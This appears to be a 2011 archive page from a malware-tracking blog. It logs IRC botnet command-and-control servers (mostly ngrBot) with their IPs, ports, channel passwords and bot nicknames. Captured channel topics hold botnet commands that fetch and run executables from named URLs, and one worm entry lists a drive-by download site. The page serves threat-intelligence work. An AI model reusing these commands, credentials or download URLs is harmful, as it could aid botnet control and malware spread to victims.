Month: June 2011

77.79.7.246(ngrBot hosted in Lithuania Splius Uab)

Uncategorized

DNS Lookup Host Name IP Address api.wipmania.com api.wipmania.com 213.251.170.52 fullyundetectable.com UDP Connections Download URLs http://213.251.170.52/ (api.wipmania.com) Outgoing connection to remote server: api.wipmania.com TCP port 80 C&C Server: 77.79.7.246:1863 Server Password: Username: iogjzhd Nickname: n{DE|XPa}iogjzhd Channel: #ngr (Password: ngrbot) Channeltopic: :.s .up http://fullyundetectable.com/uploader/1308440076.exe 5f78edacd7147892bb86f7a3e26367d9 .msn.int 5 .msn.set http://img##.lmageshack.org/images/?id=image##.jpg Now talking in #ngr Topic On: [ #ngrRead more...

xvm-9-86.ghst.net(ngrBot hosted in France Gandi)

Uncategorized

Remote Host Port Number 213.251.170.52 80 92.243.18.207 80 92.243.18.207 3212 PASS ngrBot 92.243.18.207 4949 PASS ngrBot 92.243.9.86 3211 PASS ngrBot 92.243.9.86 3333 PASS ngrBot Now talking in #nazel Topic On: [ #nazel] [ !NAZEL http://vjestice.fileave.com/46cc323cfb4d5be72a3969dff8338cdf.exe 46CC323CFB4D5BE72A3969DFF8338CDF !NAZEL http://mediahostdata.org/install.52161.exe -r !j -c US,USA,GBR,GB,AUS,AU,CA #ppi ] Topic By: [ DD ] Parts: DD [Mr_DD@HeavenOnEarth] Now talking inRead more...

yesim.hoodrich.ru(irc botnet hosted in United States South Lake Tahoe Reliablehosting.com – Network Services)

Uncategorized

Remote Host Port Number yesim.hoodrich.ru:4042 Resolved : [yesim.hoodrich.ru] To [216.131.127.13] 216.131.127.13 4042 89.201.164.126 80 NICK new[USA|XP|COMPUTERNAME]pethrmn USER xD “” “lol” :xD JOIN #biznew# PONG 422 PONG :irc.priv8net4.com C&C Server: 64.69.44.51:4042 Server Password: Username: hh Nickname: new[DEU|XP|DELL-D3E62F7E26]tmlnhjx Channel: #biznew# (Password: ) Channeltopic: :!down /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/57/38/42/59/51/59/52/20/52/54/38/67/114/97/97/40/105/109/102/ * The data identified by the following URL was then requested fromRead more...

91.211.117.46(ngrBot hosted in Ukraine Zharkov Mukola Mukolayovuch)

Uncategorized

Remote Host Port Number 213.251.170.52 80 91.211.117.81 80 91.211.117.46 1865 PASS ngrBot NICK n{US|XPa}ruzgvfp USER ruzgvfp 0 0 :ruzgvfp JOIN #main 4m3r1k4 QUIT :rebooting Now talking in #main Topic On: [ #main ] [ .m off .up http://91.211.117.81/170611.exe e449762d93dad5da997f29c92ca6c6a5 -r .mdns http://91.211.117.81/170611.txt ] Topic By: [ RamzGallagher ] hosting infos: http://whois.domaintools.com/91.211.117.46

Worm.Win32.FFAuto.uy

Uncategorized

Exe file: http://123back.com/1.EXE Java drive by: http://123back.com/ * The following Host Names were requested from a host database: o sam.chatsmate.com o ms.tvchatz.com o chatsmate.com o justchatz.com o tvchatz.com sam.chatsmate.com ms.tvchatz.com chatsmate.com justchatz.com UDP Connections Remote IP Address: Port: 7202 Send Datagram: packet(s) of size 21 Recv Datagram: 3000 packet(s) of size 0 Remote IP Address:Read more...

193.106.172.131(ngrBot hosted in Russian Federation Moscow Iqhost Ltd)

Uncategorized

Remote Host Port Number 193.106.172.131 1863 PASS ngrBot 213.251.170.52 80 NICK n{US|XPa}hvjyted USER hvjyted 0 0 :hvjyted JOIN #80t35ref 1963.g3rb3rs1t0.3691 UPDATE: NICK n{US|XPa}llwonwe USER llwonwe 0 0 :llwonwe JOIN #80t35ref 1963.g3rb3rs1t0.3691 Now talking in #80t35ref Topic On: [ #80t35ref ] [ *pu http://vector7.net/pOUI712yd.exe 0bba6a00254d8eec745e831e1e90d75d ] Topic By: [ cholo ] hosting infos: http://whois.domaintools.com/193.106.172.131